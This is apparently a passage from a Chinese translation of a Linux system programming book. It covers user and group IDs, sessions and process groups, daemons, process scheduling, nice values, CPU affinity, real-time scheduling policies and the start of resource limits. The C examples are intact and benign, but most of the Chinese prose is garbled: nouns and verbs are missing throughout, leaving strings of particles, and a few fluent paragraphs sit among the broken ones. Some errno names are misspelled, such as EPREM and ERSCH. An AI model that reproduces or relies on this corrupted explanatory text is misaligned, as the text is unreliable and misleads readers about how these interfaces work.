的 ID的实 ID、效 ID 或存设的
ID。
的对然的将 setresuid() setresgid ()
ruid rgid euid egid suid sgid。
5.5.6 操作用户 ID 组 ID 的首选方法
root seteuid() 设效 ID。 root 的进
程 ID setuid()时效
ID seteuid()。单的们的 POSIX
的的时存设的 ID。
提的能 BSD HP-UX 作出 setuid() seteuid()
的。
5.5.7 对保存设置的用户 ID 的支持
存设的 ID IEEE Std 1003.1-2001(POSIX 2001) 出的 Linux
1.1.38 内时提相的。 Linux 写的程以
存设的 id。的 Unix 写的程存设的
id 或 id POSIX SAVED IDS 。
对设的 ID ID 的上的然
的。设的 ID ID 的相即。
5.5.8 获取用户 ID 和组 ID
的调实 ID ID
#include <unistd.h>
#include <sys/types.h>
uid_t getuid (void);
gid_t getgid (void);
们能。相的调效 ID ID
#include <unistd.h>
#include <sys/types.h>
uid_t geteuid (void);
gid_t getegid (void);
调同能。
5.6 会话和进程组
进程属进程。进程或相间的进程
的的的进作业。进程的以
给进程的进程以同进程的进程、
或。
进程进程 ID(pgid的进程。进
程 ID 进程的 pid。进程进程存进
程存。即进程进程然存。
新的进程新的
。的 shell 进程。 shell 进程
(session leader)。进程的 pid 作的 ID。或
进程的集。的给
(controling terminal)。处理 I/O 的 tty 设备。
的能 shell 。们。
进程提进程的作业
的 shell 能。同时将。的
进程进程零或进程。出时
进程的进程 SIGQUIT 。出的时
进程的进程 SIGHUP 。(
Ctrl+C进程的进程 SIGINT 。以更
的理以及 shell 上的。
我们以上的设的的 shell
bash , pid 1700。的 shell 新进程的进程
进程。进程的 ID 1700 shell 的
进程。进程
进程的进程。
的存的
的进程 (进程)。进程
自的存的。
或进程进程进
程。进程的进程作业的。
$ cat ship-inventory.txt | grep booty | sort
以上 shell 进程的进程。以方
式 shell 以进程同时。
”&”以进程。 5-1 示、进程、进程
间的。
5-1 、进程、进程及间的
Linux 提设进程相的进程的。
们 shell 的进程的进程进程
进程上。
5.6.1 与会话相关的系统调用
时 shell 新的。的调
的以的
#include <unistd.h>
pid_t setsid (void);
调进程进程进程调 setsid() 新的。调
进程的进程新的进程
。调同时进程调进程进程
进程的进程。新 ID 进程 ID 设调进程的 pid。
setsid() 的新新的进程
调进程新的进程新进程的进程。对进程
何存的
。对 shell shell 的新的
。
调 setsid() 新的 ID。时 -1 errno 设
EPREM示调进程进程的进程。单的方
以何进程进程。新进程进程子
进程调 setsid()。
pid_t pid;

pid = fork ();
if (pid == -1) {
        perror ("fork");
        return -1;
} else if (pid != 0)
        exit (EXIT_SUCCESS);

if (setsid () == -1) {
        perror ("setsid");
        return -1;
}
然进程的 ID 以的
#define _XOPEN_SOURCE 500
#include <unistd.h>
pid_t getsid (pid_t pid);
对 getsid() 的调 pid 进程的 ID。 pid 0调
进程的 ID。时 -1。 errno 的能 ESRCH示 pid
何进程。 UNIX errno 设 EPREM示 pid
示的进程调进程属同。 Linux 处理
何进程的 ID。
getsid() 的
pid_t sid;

sid = getsid (0);
if (sid == -1)
        perror ("getsid"); /* should not be possible */
else
        printf ("My session id=%d\n", sid);
5.6.2 与进程组相关的系统调用
setpgid() 将 pid 进程的进程 ID 设 pgid
#define _XOPEN_SOURCE 500
#include <unistd.h>
int setpgid (pid_t pid, pid_t pgid);
pid 0调的进程 ID。 pgid 0将 pid 程的进程
ID 设进程 ID。
时 0。件
• pid 的进程调或子进程子进程调
exec pid 进程调同。
• pid 进程能进程。
• pgid 存调同。
• pgid 。
时 -1 errno 设
EACCESS pid 进程调进程的子进程调进程调 exec 。
EINVAL
pgid 小 0。
EPERM
pid 进程进程或调同的
进程。能将进程同的进程
。
ESRCH
pid 进程或 0 或进程的子进程。
以进程的进程 ID
#define _XOPEN_SOURCE 500
#include <unistd.h>

pid_t getpgid (pid_t pid);
getpgid() pid 进程的进程 ID。 pid 0进程的进程
ID。出 -1 errno 的 ERSCH示 pid 的进程
。
getsid() getpgid
pid_t pgid;

pgid = getpgid (0);
if (pgid == -1)
        perror ("getpgid"); /* should not be possible */
else
        printf ("My process group id=%d\n", pgid);
5.6.3 废弃的进程组函数
Linux BSD 的操作进程 ID 的。们
的调对性新的程
们。 setpgrp() 设进程 ID
#include <unistd.h>
int setpgrp (void);
的调
if (setpgrp () == -1)
        perror ("setpgrp");
的调的
if (setpgid (0, 0) == -1)
        perror ("setpgid");
进程 ID 设进程的进程 ID。时 0时
-1。 ERSCH setpgid() 的 errno 能 setpgrp()。
同的 getpgrp() 进程 ID
#include <unistd.h>
pid_t getpgrp (void);
的调
pid_t pgid = getpgrp ();
的的
pid_t pgid = getpgid (0);
调进程的进程 ID。 getpgid() 能。
5.7 守护进程
进程何相。进程
时们以 root 或的( apache
postfix处理的。上进程的以 d (
crond sshd的的。
(Maxwell s demon理 James
Maxwell 1867 进的实。 Daemon 的
存间的能。 Judeo-Christian 的
daemon 同的 daemon 的。实上的 daemon
的林的自的 Unix 的进
程的。
对进程 init 进程的子进程
何相。
进程以以步进程
1. 调 fork()新的进程将的进程。
2. 进程的进程调 exit()。进程(进程的
进程进程。进程进程
进程。以步的提。
3. 调 setsid()进程新的进程新的
作进程。相(进程新的
同时。
4. chdir( ) 将工作。调 fork() 新进
程的工作能文件何方。进程
时同时理
进程工作的文件。
5. 的文件。何的文件对
的文件们处。
6. 0、 1 2 文件(、出
们 /dev/null。
的程以进程
#include <sys/types.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <linux/fs.h>

int main (void)
{
        pid_t pid;
        int i;

        /* create new process */
        pid = fork ();
        if (pid == -1)
                return -1;
        else if (pid != 0)
                exit (EXIT_SUCCESS);

        /* create new session and process group */
        if (setsid () == -1)
                return -1;

        /* set the working directory to the root directory */
        if (chdir ("/") == -1)
                return -1;

        /* close all open files--NR_OPEN is overkill, but works */
        for (i = 0; i < NR_OPEN; i++)
                close (i);

        /* redirect fd's 0,1,2 to /dev/null */
        open ("/dev/null", O_RDWR);     /* stdin */
        dup (0);                        /* stdout */
        dup (0);                        /* stderror */

        /* do its daemon thing... */

        return 0;
}
Unix 们的 C 提 daemon() 工
作将的工作
#include <unistd.h>
int daemon (int nochdir, int noclose);
nochdir 零将工作。 noclose 零
的文件。进程设进程的属性
的。设 0。
时 0。时 -1。 errno 设 fork() 或 setsid() 的
。
5.8 总结
我们 Unix 进程理的进程的
进程的。我们进程理的 API进
程调方式的的 API。
第 6 章
高级进程管理
我们进程的、进程的
内。将 Linux 进程调及调然
进程理。调进程的调
调实或作出的。
6.1 进程调度
进程调内进程以的件进程调
—— 调 —— 的处理给进程的内子。
作出的程调处理效率进程同时
、。
我们进程∗。的进程
的。进、读写文件、 I/O 件的进程时间
相的时间内 (相对
时间)进程的。进程
时间 (调给进程的时间)。内的
进程进程的时间内将出
进程时间将。
进程 ()调。
进程处理时调能的。然
进程进程进程何时时间
调的。
操作能单处理上进程同时
进程操作的。处理上操作
进程同处理上。操作 DOS
能。
操作同式式。 Linux 实式的
调以进程处理进程。
∗: 原文 runnable process
的进程的的进程的时
间进程时间 (调给进程的小时间)。
同进程自。我们进程
自的出。理进程出操作绝
出。或的程能时间
。原操作
Linux 。
2.5 内的 O(1) 进程调 Linux 调∗的。 Linux 调
处理处理内存
(NUMA)实时进程自性。
6.1.1 大 O 记法
O(1) O 的子示的性扩展性。式
if f(x) is O(g(x)),
then
∃c, x1 such that f(x) ≤ c ∗ g(x), ∀x > x1
的以 f 示 x x1 f
小 g 上即 g f g f 的上。
O(1) 的小 c的
进程 Linux 进程调。对调新进程
进程 O(1) 对性能。单
的调 (以的 Linux 调)进程的进程
的的。给进程调性。
Linux 调时间内的
。
6.1.2 时间片
Linux 给进程的时间对性能。时间
进程时间能小的性
∗对的读以内的 kernel/sched.c 文件
的相的时间时间进程调上程的
时间性能。
的时间绝。给进程时间
率。给的时间的
性能。我们将 Linux 进程时间方
。
: 进程时间。 100ms 时
间的进程能 20ms 。时调
时进程出子
空调进程。进程的 80ms 或
。
6.1.3 I/O 约束进程 Vs. 处理器约束进程
时间的进程处理进程∗。进程
CPU 时间调的时间。单的子
的子处理。
方时间处的的进程I/O 进
程†。 I/O 进程文件 I/O或
。 I/O 程的子文件实程 cp 或 mv们
内 I/O 操作 GUI 程时
。
处理程 I/O 程调对同程的
同。处理程能的时间存率 (时
间性)。相 I/O 程时间
们出 I/O 内的段时间。然
I/O 程能调的。调的 I/O
程能件。更进步
的程调的给的。
处理程 I/O 程的同绝。 Linux 调
对 I/O 程 I/O 程处理程
∗process-bound
†I/O-bound
。
实上程处理 I/O 的。
子。对给程能
的时间进程能同的。
6.1.4 抢占调度
进程时间的时调新的
进程。的进程内给时间的进程新的时间
。即进程 — 进程
进程时间或的进程。
Unix 调的原: 的进程。
进程内空进程 (idle process)。实上空
进程进程能实 ()。空进程
调方的程空时间空进程的时间。
进程时进程 (进程
单)进程进
程。的进程的进程
的进程。
6.1.5 线程
程进程的单的进程程。程
自处理自的存处理。然
进程程进程实以程程
同的同空间 (同的内存映射文件
)的文件内。
Linux 内对程的。上内程对
Linux 内的程的进程。上进程
进程内的程。内程的进程
内进程的程内 (空间
的文件) 的同进程。
程程程的程。 Linux 上程程的
API IEEE Std 1003.1c-1995(POSIX 1995 or POSIX.1c) 的 API
们实 API 的pthreads。程程的相 API
。 pthreads 的内相
pthreads 的上。
6.2 让出处理器
然 Linux 操作提调
进程出处理调进程。
#include <sched.h>
int sched_yield (void);
调 sched yield() 将进程新进程内
进程。进程出的进程
。性上们以更的
调。
调 0 -1设errno。 Linux 内的
Unix 上 sched yield() 能 0。然谨的程
:
if (sched_yield ())
        perror ("sched_yield");
6.2.1 合理使用
Linux 的理 sched yield() 的
。内能作出效率的调内然
的程更何时进程同
同对的同理。
调程
件或进程的件。进程
进程出处理进程的。以
/ 单的实:
/* the consumer... */
do {
        while (producer_not_ready ())
                sched_yield ();
        process_data ();
} while (!time_to_quit ());
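上面的消费者循环可以写成一个可编译的小示例（这里用一个标志变量代替真实的生产者状态，并加上轮询上限以免无限自旋；函数名为笔者所取）：

```c
#include <sched.h>

/* Poll a flag, yielding the processor between checks so other
 * runnable processes get to go first. Returns 0 once the flag is
 * set, -1 if max_spins polls elapse first. */
int wait_for_flag (volatile int *flag, int max_spins)
{
        int spins;

        for (spins = 0; spins < max_spins; spins++) {
                if (*flag)
                        return 0;
                sched_yield ();
        }
        return *flag ? 0 : -1;
}
```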
的 Unix 程写。 Unix 程件
的 () sched yield()。
读的时。空间进程
进程同的给内对内以进程的方式
理的时。 Unix 程
文件上的件。
的 sched yield(): 空间程。
程程的的时程出处理
。内空间的时方单效。然 Linux
程实 (the New POSIX Threading Library, or NPTL)
的方即内提空间的。
sched yield() 的更 (playing nicely): 处理
集的程以时调 sched yield() 对的。出
。内能进程作出更的调
操作的调进程。对调
I/O 集程处理集程的。处理
集程的程的的
程。以将的 “nice” 给程性能
的设。
6.2.2 让出处理器方法的过去和现状
2.6 内以调 sched yield() 单的作。
进程内进程进程的内
调进程。然能进程进程。
2.6 内调:
1. 进程实时进程将的 (以
)。步。 (实时进程读实时
。)
2. 进程出进程。
进程时间进程能的进程新进
。
3. 调进程。
调 sched yield() 的实作进程时间同
内的处理时 sched yield() 的效 (同进程
然我)。
的原的理。
进程 A B 调 sched yield()。设们的进程 (
以进程进程时间)。以的 sched yield()内
调进程进程进程进程的时间
。我们以内的调 “A, B, A, B, A, B”
。
2.6 内。 A 出处理的时调将
出。 B 出。进程的时调
然 A B, 效进程处理时
间。
进程出处理的时真的出处理!
6.3 进程优先级
的实时进程实时
进程同的调的以。
Linux 进进程调。进程们
何时的。上 Unix
nice values的进程进程更的处理时
间进程对的进程更。
“nice value” 进程的时的 Linux 调的原
调的程。同时 nice 进程的时间
。
的 -20 19 间 0。的 nice
时间相 nice 时间
进程的 nice 进程对更。
。我们进程的时我们进程更
更的时间然对的更。
6.3.1 nice()
Linux 提设进程 nice 的调单的 nice():
#include <unistd.h>
int nice (int inc);
调 nice() 将 上 inc 新 。
CAP SYS NICE 能 (实上 root 的进程) 能 inc
。 root 进程能 ( nice )。
nice() -1, -1 能时的
调对 errno 0调。:
int ret;

errno = 0;
ret = nice (10);	/* increase our nice by 10 */
if (ret == -1 && errno != 0)
        perror ("nice");
else
        printf ("nice value is now %d\n", ret);
对 nice() Linux : EPERM进程提
CAP SYS NICE 能。的 nice 超出的时
EINVAL Linux 的对的上。
0 给 nice() 的单方:
printf ("nice value is currently %d\n", nice (0));
进程设绝对的相对的时以的
:
int ret, val;

/* get current nice value */
val = nice (0);

/* we want a nice value of 10 */
val = 10 - val;
errno = 0;
ret = nice (val);
if (ret == -1 && errno != 0)
        perror ("nice");
else
        printf ("nice value is now %d\n", ret);
6.3.2 getpriority() 和 setpriority()
更的方 getpriority() setpriority() 调以更的
能然更
#include <sys/time.h>
#include <sys/resource.h>
int getpriority (int which, int who);
int setpriority (int which, int who, int prio);
作 “which” “who” 的 进 程进 程 或
which的 PRIO PROCESS、 PRIO PGRP 或 PRIO USER对
who进程 ID进程 ID 或 ID。who 0 的时
进程进程或。
getpriority() 进程的 (nice 小) setpriority() 将
进程的设prio。同 nice() CAP SYS NICE 能
的进程能提进程的 ( nice )更进步
的进程能调属的进程的。
getpriority() 的时 -1 -1 能的同
nice() 处理程调空 error 。 setpriority()
0 -1。
进程的子:
int ret;

ret = getpriority (PRIO_PROCESS, 0);
printf ("nice value is %d\n", ret);
设进程进程 10 的子:
int ret;

ret = setpriority (PRIO_PGRP, 0, 10);
if (ret == -1)
        perror ("setpriority");
的时设 errno 以:
EACCESS 进程 CAP SYS NICE 能提进程。 (
setpriority())
EINVAL
“which” 的 PRIO PROCESS, PRIO PGRP 或 PRIO USER 。
EPERM
的进程效 ID 调进程效 ID 调进程
CAP SYS NICE 能。 ( setpriority())
ESRCH
存whichwho的进程。
6.3.3 I/O 优先级
作进程的 Linux 进程 I/O 内 I/O 调
() 自 I/O 的。
I/O 调进程 I/O 设
自 I/O 。然 Linux 内调单设
I/O:
int ioprio_get (int which, int who)
int ioprio_set (int which, int who, int ioprio)
内出调 glibc 提空间
。 glibc 的相的。以 glibc
的时能调同。方操作
进程 I/O : nice 或 “ionice”∗的实程。
∗ ionice 是 util-linux 软件包的一部分，可从 http://www.kernel.org/pub/linux/utils/utl-linux 获得，以 GNU General Public License v2 发布。
的 I/O 调 I/O Complete Fair Queu-
ing(CFQ) I/O 调的调。 I/O 调 I/O
相调何提示。
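由于 glibc 不提供这两个调用的封装，用户空间要通过 syscall(2) 直接发起系统调用。下面是一个示意（其中的常量对应内核的 ioprio 编码，是笔者自行定义的，并非 glibc 的 API）：

```c
#define _GNU_SOURCE
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

/* Kernel ioprio encoding: scheduling class in the top 3 bits of a
 * 16-bit value, priority level in the rest (see linux/ioprio.h). */
#define IOPRIO_WHO_PROCESS  1
#define IOPRIO_CLASS_SHIFT  13

/* Return the I/O priority value of the given process (pid 0 means
 * the calling process), or -1 on error. */
static long get_io_priority (pid_t pid)
{
        return syscall (SYS_ioprio_get, IOPRIO_WHO_PROCESS, pid);
}
```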
6.4 处理器亲和度
Linux 以处理进程处理的
工作进程调。对处理 (SMP) 上进程调
CPU 上进程: 调
的处理处理空。然进程 CPU 上
进程调同 CPU 上处理间的进程
性能。
的性能自的存效†。 SMP 的设
处理的存自的处理存的。
进程新处理上写新内存时原处理的存
能。存读新的内存时
存效。时处理的存效
(设存)。进程的时方的相: 进程能
存原存的效。进程调
进程处理。
实上进程调的的。处理处
理的进程 — 或更处理处理空
— 新调进程 CPU 上的。何时进程
对 SMP 的性能。
处理进程同处理上的能性。
(soft affinity) 调调进程同处理上的自然上文
的以的性。 Linux 调能
的时进程小的存效
能的处理。
然时或程进程处理间的
进程存‡同处理的。
†:cache effects
‡: cache-sensitive
(hard affinity) 内进程处理的。
6.4.1 sched getaffinity() 和 sched setaffinity()
进程进程处理能何 CPU
上。 Linux 提调设进程的‡:
#define _GNU_SOURCE
#include <sched.h>

typedef struct cpu_set_t;

size_t CPU_SETSIZE;

void CPU_SET (unsigned long cpu, cpu_set_t *set);
void CPU_CLR (unsigned long cpu, cpu_set_t *set);
int CPU_ISSET (unsigned long cpu, cpu_set_t *set);
void CPU_ZERO (cpu_set_t *set);

int sched_setaffinity (pid_t pid, size_t setsize,
                       const cpu_set_t *set);
int sched_getaffinity (pid_t pid, size_t setsize,
                       cpu_set_t *set);
调 sched getaffinity() 以 “pid” 的进程的处理存
cpu set t 以的。pid 0进程的
。setsize cpu set t 的小 glibc 将时
然性。的时 0 -1设 errno。子
:
cpu_set_t set;
int ret, i;

CPU_ZERO (&set);
ret = sched_getaffinity (0, sizeof (cpu_set_t), &set);
if (ret == -1)
        perror ("sched_getaffinity");
‡: hard affinity
for (i = 0; i < CPU_SETSIZE; i++) {
        int cpu;

        cpu = CPU_ISSET (i, &set);
        printf ("cpu=%i is %s\n", i, cpu ? "set" : "unset");
}
调 我 们 CPU ZERO 零 的 进 然 0
CPU SETSIZE set 上的。 CPU SETSIZE set 的小 — 然
能示 setsize— set 能示的处理。的实 1
进示处理以 CPU SETSIZE sizeof(cpu set t) 。我们
CPU ISSET 的处理进程 0 示 0
。
实存的处理能处理的上上
将:
cpu=0 is set
cpu=1 is set
cpu=2 is unset
cpu=3 is unset
...
cpu=1023 is unset
出以的 CPU SETSIZE( 0 ) 1,024。
我们 CPU #0 #1 存的处理我们我们的进
程 CPU #0 上。:
cpu_set_t set;
int ret, i;

CPU_ZERO (&set);        /* clear all CPUs */
CPU_SET (0, &set);      /* allow CPU #0 */
CPU_CLR (1, &set);      /* forbid CPU #1 */
ret = sched_setaffinity (0, sizeof (cpu_set_t), &set);
if (ret == -1)
        perror ("sched_setaffinity");

for (i = 0; i < CPU_SETSIZE; i++) {
        int cpu;

        cpu = CPU_ISSET (i, &set);
        printf ("cpu=%i is %s\n", i, cpu ? "set" : "unset");
}
我们 CPU ZERO 零 set然 CPU SET 对 CPU #0 1,
CPU CLR 对 CPU #1 0。 零 set 以 CPU CLR 零
的处性的。
同的处理上同的出:
cpu=0 is set
cpu=1 is unset
cpu=2 is unset
...
cpu=1023 is unset
CPU #1 进程何 CPU #0 上。
能的:
EFAULT 提的进程的空间或效。
EINVAL 处理调 ( sched setaffinity())或 set-
size 小内示处理集的的小。
EPERM
pid 的 进 程 属 调 进 程 的 效 ID 进 程
CAP SYS NICE 能。
ESRCH
pid 的进程存。
6.5 实时系统
实时的。
操作∗— 间的小 — 的
∗: operational deadlines
实时的。上以的 (ABS)
的实时。的时内
调以
性能。的操作能相
能。
Linux 内的操作提的实时。
6.5.1 软硬实时系统
实时实时。实时对操作
超。方实时超
的。
实时: 、、设备、处理
的子。实时的子
处理程: 超操作时的
以的。
的时间能满
程。文程能
或的。
实时然写程的时们及时
。的操作实时程的。
同实时。实上相同的件件
实时更能实时原即
实时进程的。的实时的同操作
时的。的子出的内 SCRAM
的能。操作的实
时。相能 100ms 内
或出的对操作的实
时。
6.5.2 延时,抖动和截止期限
时的时间时小操作
。实时操作时的以的间
时处理。实时时出
内。
时的时间。然给
上时间及时的能。的的方
处理实上们时间的。件间的时间
时。
10ms 的。性能我们给上
时间 10ms 间的我们的
间的。的时间我们
间的时间即 10ms 我们何时
。或更的时的实
时。以的的的
的。何我们对实
实时出小的们段时间
段时间内。零时操作间。时超
间。
实时对更。理时间操作
间内时。以时作性
能的。
6.5.3 Linux 的实时支持
Linux IEEE Std 1003.1b-1993(写 POSIX 1993 或 POSIX.1b) 的
调程提实时。
上 POSIX 提的实时。实
上 POSIX 的调操作何时
间操作设。
Linux 内性能的的实时
提小的时更的。原进能
程 I/O 进程实时进对
Linux 式实时的献。
的式实时对 Linux 内的存
的 Linux 方的方内。的进步
时实时的。的方内内
。的实时 POSIX 的
。
6.5.4 Linux 调度策略和优先级
linux 对进程的调进程的调调。 Linux
提实时调作的。文件 <sched.h> 的
示: SCHED FIFO, SCHED RR SCHED OTHER。
进程 nice 的对程
0对实时程 1 99。 Linux 调的进程
(的进程)。 50 的进程时
51 的进程调进程新的
进程。相 49 的进程
50 的进程。进程 0以实时进程
实时进程。
6.5.4.1 “先进先出”策略
进出 (FIFO) 时间的单的实时。
进程 FIFO 进程 SCHED FIFO 示。
时间的操作相单:
• 的 FIFO 进程的进程
。的 FIFO 进程进程。
• FIFO 进程或调 sched yield()或进
程。
• FIFO 进程时调将出。时
相同进程的。或同进程
。
• FIFO 进程调 sched yield() 时调将同的
同进程。同
进程 sched yield() 将作。
• FIFO 进程的。
进程的 FIFO 进程。
• 进程 FIFO 或进程将相
的。新的 FIFO 进程能同进程。
上我们以 FIFO 进程能
。的同的 FIFO 进程间的。
6.5.4.2 轮转策略
FIFO 处理同进程的
以 SCHED RR 示。
调给 RR 进程时间。 RR 进程时间
时调将的方式 RR 进程间能
调。进程给上 RR 同 FIFO
时间然。
我们以 RR 进程同 FIFO 进程时间的时
同的。
SCHED FIFO 或 SCHED RR 内的操作 RR
的时间相同的进程间相。 FIFO 进程 RR 进程
给进程间调出进程进程的
。
6.5.4.3 普通调度策略
SCHED OTHER 调的实时进程。
进程的 0 FIFO 或 RR 进程们。
调的 nice 进程的
nice 的 0。
6.5.4.4 批调度策略
SCHED BATCH 调或空调的程上实时调
的对: 的进程进程时即
进程时间。同进程进程
进程时间。
6.5.4.5 设置 Linux 调度策略
进程以 sched getscheduler() sched setscheduler() 操作 Linux 调
:
#include <sched.h>
struct sched_param {
/* ... */
int sched_priority;
/* ... */
};
int sched_getscheduler (pid_t pid);
int sched_setscheduler (pid_t pid, int policy,
const struct sched_param *sp);
对 sched getscheduler() 的调将 pid 进程的调
pid 0 调 进 程 的 调 。 <sched.h>
示 调 :SCHED FIFO 示 进 出 SCHED RR 示
SCHED OTHER 示进程。 -1(-1 效的调
)同时设。
单:
int policy;

/* get our scheduling policy */
policy = sched_getscheduler (0);

switch (policy) {
case SCHED_OTHER:
        printf ("Policy is normal\n");
        break;
case SCHED_RR:
        printf ("Policy is round-robin\n");
        break;
case SCHED_FIFO:
        printf ("Policy is first-in, first-out\n");
        break;
case -1:
        perror ("sched_getscheduler");
        break;
default:
        fprintf (stderr, "Unknown policy!\n");
}
调 sched setscheduler() 将设 pid 进程的调的
sp 。 pid 0 时进程将设自的。
0 -1 设。
sched param 的 效 段 操 作 的 调 。
SCHED RR SCHED FIFO 段 sched priority
。 SCHED OTHER 何段然的调能。
的程对的布作出何设。
设进程调单:
struct sched_param sp = { .sched_priority = 1 };
int ret;

ret = sched_setscheduler (0, SCHED_RR, &sp);
if (ret == -1) {
        perror ("sched_setscheduler");
        return 1;
}
设调进程调 1。我们设 1 效
— 上。我们何效
。
设 SCHED OTHER 的 调 CAP SYS NICE 能
root 实时进程。 2.6.12 内 RLIMIT RTPRIO
root 上内设实时。
。时设:
EFAULT sp 的内存或。
EINVAL policy 的调效或 sp 给的 (实
sched setscheduler())。
EPERM
调进程备的能。
ESRCH
pid 的进程。
6.5.5 设置调度参数
POSIX 的 sched getparam() sched setparam() 以设
调的相:
#include <sched.h>
struct sched_param {
/* ... */
int sched_priority;
/* ... */
};
int sched_getparam (pid_t pid, struct sched_param
*sp);
int sched_setparam (pid_t pid, const struct
sched_param *sp);
sched getscheduler() 调 sched getparam() 将 pid 进程
的调存 sp :
struct sched_param sp;
int ret;

ret = sched_getparam (0, &sp);
if (ret == -1) {
        perror ("sched_getparam");
        return 1;
}

printf ("Our priority is %d\n", sp.sched_priority);
pid 0调进程的。 0 -1设。
sched setscheduler() 能设何调以 sched setparam()
:
struct sched_param sp;
int ret;

sp.sched_priority = 1;
ret = sched_setparam (0, &sp);
if (ret == -1) {
        perror ("sched_setparam");
        return 1;
}
sp 设 pid 进程的调 0。
-1设 errno。
我们上文段的出:
Our priority is 1
子设 1 时实的程
。我们何效的。
6.5.5.1 错误码
能设:
EFAULT sp 的内存或。
EINVAL sp 给的 (实 sched getparam())。
EPERM
调进程备的能。
ESRCH
pid 的进程。
6.5.5.2 确定有效优先级的范围
上的子我们调。 POSIX 能
上的调 32 。Linux
调我们提 Linux 实时调提 1
99 99 。的程实自的然映射
操作的上。同的实时以
。
Linux 提调小
:
#include <sched.h>

int sched_get_priority_min (int policy);
int sched_get_priority_max (int policy);
成功时，sched_get_priority_min() 和 sched_get_priority_max() 分别返回 policy 所指定调度策略的最小和最大有效优先级。失败时两者均返回 -1；唯一可能的错误是 policy 无效，此时 errno 被设置为 EINVAL。
单:
int min, max;

min = sched_get_priority_min (SCHED_RR);
if (min == -1) {
        perror ("sched_get_priority_min");
        return 1;
}

max = sched_get_priority_max (SCHED_RR);
if (max == -1) {
        perror ("sched_get_priority_max");
        return 1;
}

printf ("SCHED_RR priority range is %d - %d\n", min, max);
Linux 上:
SCHED_RR priority range is 1 - 99
的。的以设进程
的相的:
/*
 * set_highest_priority - set the associated pid's scheduling
 * priority to the highest value allowed by its current
 * scheduling policy. If pid is zero, sets the current
 * process's priority.
 *
 * Returns zero on success.
 */
int set_highest_priority (pid_t pid)
{
        struct sched_param sp;
        int policy, max, ret;

        policy = sched_getscheduler (pid);
        if (policy == -1)
                return -1;

        max = sched_get_priority_max (policy);
        if (max == -1)
                return -1;

        memset (&sp, 0, sizeof (struct sched_param));
        sp.sched_priority = max;

        ret = sched_setparam (pid, &sp);

        return ret;
}
程的小或然 1 ( max-1, max-2
)给的进程。
6.5.6 sched rr get interval()
SCHED RR 进程 时间 SCHED FIFO 进程相
同。 SCHED RR 进程时间的时调将同的
。方式相同的 SCHED RR 进程。
进程时间进程 (同或的 SCHED FIFO 进
程) 。
POSIX 进程时间的:
#include <sched.h>

struct timespec {
        time_t tv_sec;   /* seconds */
        long tv_nsec;    /* nanoseconds */
};

int sched_rr_get_interval (pid_t pid, struct timespec *tp);
sched rr get interval() 的对的调将 pid
进程的时间存 tp 的 timespec 然 0
-1设 errno。
POSIX 能工作 SCHED RR 进程然 Linux 上
以进程的时间。能工作
Linux 的程以作的展。子:
struct timespec tp;
int ret;

/* get the current task's timeslice length */
ret = sched_rr_get_interval (0, &tp);
if (ret == -1) {
        perror ("sched_rr_get_interval");
        return 1;
}

/* convert the seconds and nanoseconds to milliseconds */
printf ("Our time quantum is %.2lf milliseconds\n",
        (tp.tv_sec * 1000.0f) + (tp.tv_nsec / 1000000.0f));
进程 FIFO tv sec tv nsec 0的时间
。
6.5.6.1 错误码
能的:
EFAULT tp 的内存效或。
EINVAL pid 效 ( pid )。
ESRCH
pid 效存的进程。
6.5.7 关于实时进程的一些提醒
实时进程的调程的时
。实时程能。程
实时程何处理的 — 或何的 —
。
设实时程小的程
。提:
• 何处理的或进程
。将。
• 实时进程的以设的时
的处理时间。
• 小。实时进程进程的
进程处。
• 实时程的时更的进
程。的进程。 (空
的时实时进程。)
• util-linux 工的 chrt 实程以设实时进程属性更
。以单程实时调的或
的实时。
6.5.8 确定性
实时进程性。实时给相同的
作相同的时间内相同的我们作的。
以的集: 存 ()处理
页作时间能。然我们
作 (相对) 的同时
我们作的时间。
实时性的时。的
的方。
6.5.8.1 数据故障预测和内存锁定
:ICBM() 件设备
件内。进程件
设备上内进程。内进程实时进程
进程将调实时进
程。调实时进程上文相的空间。进程
程 0.3ms 1ms 的内。
空间实时进程的 ICBM处理。
实时进程。 0.1ms ABM
。 — —ABM 的上。页处理
内式 I/O 出的。实时进程
处理页。
然页给实时进程性。
实时或将空间的页提
理内存出。页内将出
何页实时页理内
存。
Linux 方 提 。 Chapter 4 的
Chapter 8 将内存的。
6.5.8.2 CPU 亲和度和实时进程
实时的。然 Linux 内式的调
能调进程。时进程内的调
出时实时进程时将
超出操作。
页相的。对的方
: 。然提能单进程
以 Linux — 单的操作能满。的
处理以或实时进程。实效上
实时进程离。
操作进程 CPU 的调。的对实时进程
的实时进程处理的处理进程。
单的方 Linux 的 init 程 SysVinit∗, 以
的作:
cpu_set_t set;
int ret;

CPU_ZERO (&set);        /* clear all CPUs */
ret = sched_getaffinity (0, sizeof (cpu_set_t), &set);
if (ret == -1) {
        perror ("sched_getaffinity");
        return 1;
}

CPU_CLR (1, &set);      /* forbid CPU #1 */
ret = sched_setaffinity (0, sizeof (cpu_set_t), &set);
if (ret == -1) {
        perror ("sched_setaffinity");
        return 1;
}
的处理集我们处理。然出
处理 CPU #1更新处理集。
处理集子进程间 init 进程的以
的进程的处理集 CPU #1 上将何进程。
实时程 CPU #1 上:
cpu_set_t set;
int ret;

CPU_ZERO (&set);        /* clear all CPUs */
CPU_SET (1, &set);      /* allow CPU #1 */
ret = sched_setaffinity (0, sizeof (cpu_set_t), &set);
if (ret == -1) {
        perror ("sched_setaffinity");
        return 1;
}

∗ SysVinit 可从 ftp://ftp.cistron.nl/pub/people/miquels/sysvinit/ 获得，以 GNU General Public License v2 发布。
实时进程 CPU #1 上的进程处
理。
6.6 资源限制
Linux 内对进程的进程以的内的
上文件的内存页处理的。性
的内进程的超性。文件的操作
进程的文件超出 open() 调†。
Linux 提供了两个操作资源限制的系统调用。二者均由 POSIX 标准化，Linux 用 getrlimit() 获取限制、用 setrlimit() 设置限制：
#include <sys/time.h>
#include <sys/resource.h>

struct rlimit {
        rlim_t rlim_cur; /* soft limit */
        rlim_t rlim_max; /* hard limit */
};

int getrlimit (int resource, struct rlimit *rlim);
int setrlimit (int resource, const struct rlimit *rlim);
RLIMIT CPU 的 示 rlimit 示 实
。 上 : 。内 对 进 程
†时调设 EMFILE进程文件上。 Chapter 2 open()
调
进程自以以 0 间的。备
CAP SYS RESOURCE 能的进程 ( root 进程)能调。
程能提的的调
的。进程以设。
的相。 RLIMIT FSIZE示进程以
的文件单。时 rlim cur 1024进程以
1K 的文件能扩展文件 1k 以上。
的: 0 。示
